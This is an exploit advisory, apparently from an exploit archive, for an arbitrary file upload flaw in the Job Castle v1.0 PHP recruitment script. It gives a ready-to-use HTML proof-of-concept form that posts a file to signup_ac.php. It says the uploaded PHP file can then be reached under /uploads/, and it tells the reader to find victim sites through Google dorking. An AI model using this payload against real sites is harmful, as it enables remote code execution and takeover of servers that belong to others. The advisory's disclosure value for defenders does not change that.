Authored by indoushka

Job Castle version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================
| # Title : Job Castle v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://download-media.code-projects.org/2020/04/Job_Recruitment_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new folder and upload a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply .

[+] infected file : /signup_ac.php.

[+] save code as poc.html .

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Job Seeker Registration</title>
</head>
<body>
<h2>Job Seeker Registration</h2>
<form name="jobseeker_registration" action="http://127.0.0.1/Job-Castle-master/signup_ac.php" method="POST" enctype="multipart/form-data">


<label for="file">Upload Resume:</label>
<input type="file" id="file" name="file" required><br><br>

<button type="submit" name="button2">GO GO GO ...</button>
</form>
</body>
</html>

[+] path http://127.0.0.1/Job-Castle-master/uploads/😈.php


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================